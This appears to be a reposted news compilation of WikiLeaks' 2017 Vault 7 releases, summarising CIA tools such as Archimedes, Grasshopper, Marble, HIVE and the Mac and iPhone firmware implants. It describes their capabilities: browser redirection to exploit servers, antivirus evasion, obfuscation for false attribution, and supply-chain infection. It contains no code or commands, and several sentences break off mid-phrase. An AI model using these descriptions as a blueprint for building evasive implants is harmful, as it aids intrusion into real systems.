In its seventh CIA leak since March 23rd, WikiLeaks has just revealed
the user manual of a CIA hacking tool known as ‘Archimedes' which is purportedly used to attack computers inside a Local Area Network (LAN).
The CIA tool works by redirecting a target's webpage search to a CIA
server which serves up a webpage that looks exactly like the original
page they were expecting to be served, but which contains malware. It's
only possible to detect the attack by examining the page source.
Today, May 5th 2017, WikiLeaks publishes "Archimedes", a tool used
by the CIA to attack a computer inside a Local Area Network (LAN),
usually used in offices. It allows the re-directing of traffic from the
target computer inside the LAN through a computer infected with this
malware and controlled by the CIA. This technique is used by the CIA to redirect the target's computers web browser to an exploitation server
while appearing as a normal browsing session.
The document illustrates a type of attack within a "protected
environment" as the the tool is deployed into an existing local network
abusing existing machines to bring targeted computers under control and allowing further exploitation and abuse.
RELEASE: CIA '#Archimedes' system for exfiltration and browser
hijacking. Includes manuals and binary signatures. https://t.co/XWr33GMGDN pic.twitter.com/TEyhABJvbO
— WikiLeaks (@wikileaks) May 5, 2017
The RT provided more details:
The Archimedes tool enables traffic from one computer inside the LAN
to be redirected through a computer infected with this malware and
controlled by the CIA, according to WikiLeaks.
The technique is used to redirect the target's computer web browser
to an exploitation server while appearing as a normal browsing session,
the whistleblowing site said. In this way, the hackers gain an entry
point that allows them access to other machines on that network.
The tool's user guide, which is dated December 2012, explains that
it's used to re-direct traffic in a Local Area network (LAN) from a
"target's computer through an attacker controlled computer before it is
passed to the gateway.”
This allows it to insert a false web-server response that redirects
the target's web browser to a server that will exploit their system all
the while appearing as if it's a normal browsing session.
Archimedes is an update to a tool called ‘Fulcrum' and it offers several improvements on the previous system, including providing a method of "gracefully shutting down the tool on demand.”
How is US government malware developed? WikiLeaks' release today of
the CIA's 'Fulcrum' malware shows how https://t.co/wrke6MC5ex pic.twitter.com/R5tO7dVYPz
— WikiLeaks (@wikileaks) May 5, 2017
Today, April 28th 2017, WikiLeaks publishes the documentation and source
code for CIA's "Scribbles" project, a document-watermarking
preprocessing system to embed "Web beacon"-style tags into documents
that are likely to be copied by Insiders, Whistleblowers, Journalists or others. The released version (v1.0 RC1) is dated March, 1st 2016 and
classified SECRET//ORCON/NOFORN until 2066.
Scribbles is intended for off-line preprocessing of Microsoft Office
documents. For reasons of operational security the user guide demands
that "[t]he Scribbles executable, parameter files, receipts and log
files should not be installed on a target machine, nor left in a
location where it might be collected by an adversary."
According to the documentation, "the Scribbles document watermarking
tool has been successfully tested on [...] Microsoft Office 2013 (on
Windows 8.1 x64), documents from Office versions 97-2016 (Office 95
documents will not work!) [and d]ocuments that are not be locked forms, encrypted, or password-protected". But this limitation to Microsoft
Office documents seems to create problems: "If the targeted end-user
opens them up in a different application, such as OpenOffice or
LibreOffice, the watermark images and URLs may be visible to the
end-user. For this reason, always make sure that the host names and URL components are logically consistent with the original content. If you
are concerned that the targeted end-user may open these documents in a non-Microsoft Office application, please take some test documents and
evaluate them in the likely application before deploying them."
Security researches and forensic experts will find more detailed
information on how watermarks are applied to documents in the source
code, which is included in this publication as a zipped archive.
Today, April 21st 2017, WikiLeaks publishes the User Guide for CIA's
"Weeping Angel" tool - an implant designed for Samsung F Series Smart Televisions. Based on the "Extending" tool from the MI5/BTSS, the
implant is designed to record audio from the built-in microphone and
egress or store the data.
The classification marks of the User Guide document hint that is was
originally written by the british MI5/BTSS and later shared with the
CIA. Both agencies collaborated on the further development of the
malware and coordinated their work in Joint Development Workshops.
Extending - User Guide
14 April, 2017
Today, April 14th 2017, WikiLeaks publishes six documents from the CIA's
HIVE project created by its "Embedded Development Branch" (EDB).
HIVE is a back-end infrastructure malware with a public-facing HTTPS
interface which is used by CIA implants to transfer exfiltrated
information from target machines to the CIA and to receive commands from
its operators to execute specific tasks on the targets. HIVE is used
across multiple malware implants and CIA operations. The public HTTPS
interface utilizes unsuspicious-looking cover domains to hide its
Anti-Virus companies and forensic experts have noticed that some
possible state-actor malware used such kind of back-end infrastructure
by analyzing the communication behaviour of these specific implants, but
were unable to attribute the back-end (and therefore the implant itself)
to operations run by the CIA. In a recent blog post by Symantec, that
was able to attribute the "Longhorn" activities to the CIA based on the
Vault 7, such back-end infrastructure is described:
For C&C servers, Longhorn typically configures a specific domain and IP address combination per target. The domains appear to be registered by
the attackers; however they use privacy services to hide their real
identity. The IP addresses are typically owned by legitimate companies
offering virtual private server (VPS) or webhosting services. The
malware communicates with C&C servers over HTTPS using a custom
underlying cryptographic protocol to protect communications from identification.
The documents from this publication might further enable anti-malware researchers and forensic experts to analyse this kind of communication
between malware implants and back-end servers used in previous illegal activities.
Today, April 7th 2017, WikiLeaks releases Vault 7 "Grasshopper" -- 27
documents from the CIA's Grasshopper framework, a platform used to build customized malware payloads for Microsoft Windows operating systems.
Grasshopper is provided with a variety of modules that can be used by a
CIA operator as blocks to construct a customized implant that will
behave differently, for example maintaining persistence on the computer differently, depending on what particular features or capabilities are
selected in the process of building the bundle. Additionally,
Grasshopper provides a very flexible language to define rules that are
used to "perform a pre-installation survey of the target device,
assuring that the payload will only [be] installed if the target has the
right configuration". Through this grammar CIA operators are able to
build from very simple to very complex logic used to determine, for
example, if the target device is running a specific version of Microsoft Windows, or if a particular Antivirus product is running or not.
Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption).
The requirement list of the Automated Implant Branch (AIB) for
Grasshopper puts special attention on PSP avoidance, so that any
Personal Security Products like 'MS Security Essentials', 'Rising',
'Symantec Endpoint' or 'Kaspersky IS' on target machines do not detect Grasshopper elements.
One of the persistence mechanisms used by the CIA here is 'Stolen Goods'
- whose "components were taken from malware known as Carberp, a
suspected Russian organized crime rootkit." confirming the recycling of
malware found on the Internet by the CIA. "The source of Carberp was
published online, and has allowed AED/RDB to easily steal components as
needed from the malware.". While the CIA claims that "[most] of Carberp
was not used in Stolen Goods" they do acknowledge that "[the]
persistence method, and parts of the installer, were taken and modified
to fit our needs", providing a further example of reuse of portions of
publicly available malware by the CIA, as observed in their analysis of
leaked material from the italian company "HackingTeam".
The documents WikiLeaks publishes today provide an insights into the
process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers,
providing directions for those seeking to defend their systems to
identify any existing compromise
Today, March 31st 2017, WikiLeaks releases Vault 7 "Marble" -- 676
source code files for the CIA's secret anti-forensic Marble Framework.
Marble is used to hamper forensic investigators and anti-virus companies
from attributing viruses, trojans and hacking attacks to the CIA.
Marble does this by hiding ("obfuscating") text fragments used in CIA
malware from visual inspection. This is the digital equivallent of a
specalized CIA tool to place covers over the english language text on
U.S. produced weapons systems before giving them to insurgents secretly
backed by the CIA.
Marble forms part of the CIA's anti-forensics approach and the CIA's
Core Library of malware code. It is "[D]esigned to allow for flexible
and easy-to-use obfuscation" as "string obfuscation algorithms
(especially those that are unique) are often used to link malware to a
specific developer or development shop."
The Marble source code also includes a deobfuscator to reverse CIA text obfuscation. Combined with the revealed obfuscation techniques, a
pattern or signature emerges which can assist forensic investigators
attribute previous hacking attacks and viruses to the CIA. Marble was in
use at the CIA during 2016. It reached 1.0 in 2015.
The source code shows that Marble has test examples not just in English
but also in Chinese, Russian, Korean, Arabic and Farsi. This would
permit a forensic attribution double game, for example by pretending
that the spoken language of the malware creator was not American
English, but Chinese, but then showing attempts to conceal the use of
Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake
The Marble Framework is used for obfuscation only and does not contain
any vulnerabilties or exploits by itself.
Marble Framework (Source Code)
23 March, 2017
Today, March 23rd 2017, WikiLeaks releases Vault 7 "Dark Matter", which contains documentation for several CIA projects that infect Apple Mac
firmware (meaning the infection persists even if the operating system is re-installed) developed by the CIA's Embedded Development Branch (EDB).
These documents explain the techniques used by CIA to gain 'persistence'
on Apple Mac devices, including Macs and iPhones and demonstrate their
use of EFI/UEFI and firmware malware.
Among others, these documents reveal the "Sonic Screwdriver" project
which, as explained by the CIA, is a "mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting" allowing an attacker to boot its attack software for example from a USB stick "even
when a firmware password is enabled". The CIA's "Sonic Screwdriver"
infector is stored on the modified firmware of an Apple
"DarkSeaSkies" is "an implant that persists in the EFI firmware of an
Apple MacBook Air computer" and consists of "DarkMatter", "SeaPea" and "NightSkies", respectively EFI, kernel-space and user-space implants.
Documents on the "Triton" MacOSX malware, its infector "Dark Mallet" and
its EFI-persistent version "DerStarke" are also included in this
release. While the DerStarke1.4 manual released today dates to 2013,
other Vault 7 documents show that as of 2016 the CIA continues to rely
on and update these systems and is working on the production of
Also included in this release is the manual for the CIA's "NightSkies
1.2" a "beacon/loader/implant tool" for the Apple iPhone. Noteworthy is
that NightSkies had reached 1.2 by 2008, and is expressly designed to be physically installed onto factory fresh iPhones. i.e the CIA has been
infecting the iPhone supply chain of its targets since at least 2008.
While CIA assets are sometimes used to physically infect systems in the
custody of a target it is likely that many CIA physical access attacks
have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise.
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)